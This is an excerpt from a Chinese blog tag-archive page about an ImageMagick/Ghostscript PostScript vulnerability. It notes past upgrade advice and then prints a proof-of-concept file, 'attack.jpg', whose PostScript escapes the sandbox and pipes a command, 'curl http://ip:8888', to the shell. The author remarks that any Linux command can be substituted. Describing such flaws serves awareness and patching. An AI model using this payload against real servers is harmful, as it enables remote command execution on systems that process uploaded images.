标签归档:imagemagick

imagemagick postscript漏洞

之前2016年的imagemagick的漏洞,升级到最新版本就行了。 https://www.jianshu.com/p/502e39c122e6 下载最新的版本执行不成功: convert: Not a JPEG file: starts with 0×70 0×75 `attack4.jpg’ @ error/jpeg.c/JPEGErrorHandler/332.   最近又来了这种 把以下内容保存为:attack.jpg %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%curl http://ip:8888) currentdevice putdeviceprops 红色部分可以改成其他任意linux命令,这个是相当严重的问题。 … 继续阅读

发表在 服务器端 | 标签为 | 留下评论